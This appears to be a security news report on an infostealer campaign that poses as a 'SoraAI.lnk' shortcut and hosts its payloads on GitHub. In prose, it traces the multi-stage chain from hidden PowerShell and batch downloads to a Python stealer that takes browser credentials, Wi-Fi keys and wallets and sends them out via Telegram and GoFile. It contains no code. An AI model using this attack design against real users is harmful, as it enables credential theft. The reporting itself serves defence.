Malicious Actors Exploit SoraAI’s Popularity & GitHub to Distribute Malware

Threat actors are leveraging the growing popularity of OpenAI’s Sora, a cutting-edge video generation model, to distribute malicious software.

Disguised as a legitimate shortcut file named “SoraAI.lnk,” this information-stealing malware mimics the branding of Sora to trick users into initiating a multi-stage attack chain.

Deceptive Tactics Target OpenAI’s Sora Brand

First reported on VirusTotal from Vietnam on May 21, 2025, the malware has since spread to multiple countries, though the exact number of affected individuals remains unclear.

This campaign highlights the increasing use of social engineering tactics to exploit user trust in well-known AI tools, with attackers hosting their malicious payloads on trusted platforms like GitHub to evade suspicion.

The attack begins when a user double-clicks the “SoraAI.lnk” shortcut, which triggers a connection to cmd.exe with a predefined argument, launching a hidden PowerShell process.

This process downloads a malicious batch file, “a.bat,” from a GitHub repository into the victim’s Temp folder.

The script then executes a looped download attempt for additional payloads, ensuring persistence even if initial attempts fail.

Subsequent stages involve the execution of further batch files, “f.bat” and “1.bat,” which orchestrate the installation of legitimate Python packages like requests, pywin32, and cryptography, ultimately running a malicious Python script, “python.py.”

This script establishes persistence by placing itself in the startup folder and targets a wide array of sensitive data.

Multi-Stage Attack Chain

It extracts browser cookies, passwords, and profiles from applications like Chrome, Firefox, and Opera, decrypting encrypted data using a custom “chrome_decrypt.dll.”

Additionally, it collects system information, Wi-Fi credentials via the netsh tool, cryptocurrency wallet details, and configuration data from popular gaming platforms such as Steam and Epic Games.

The harvested data is compressed into a zip file, named with the victim’s country and IP, and exfiltrated via a Telegram bot API.

For larger files exceeding 49MB, the malware uploads them to the external hosting service GoFile.io, notifying attackers through Telegram while deleting local traces to cover its tracks.

This intricate attack chain also scavenges files with common extensions (.pdf, .jpg, .txt) and data from critical directories like Downloads and Documents, amplifying the potential damage to victims through identity theft or further exploitation.

As the digital landscape continues to evolve, distinguishing between legitimate and malicious resources becomes paramount.

Users must exercise caution by downloading files exclusively from trusted sources and verifying file authenticity before execution, as damage from such malware is often irreversible once initiated.

Staying informed about cyberattack methodologies and deploying robust antivirus solutions like K7 Total Security can significantly mitigate risks.

According to the Report, K7 Labs, for instance, offers detection capabilities for such information stealers at various infection stages.

Indicators of Compromise (IOCs)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.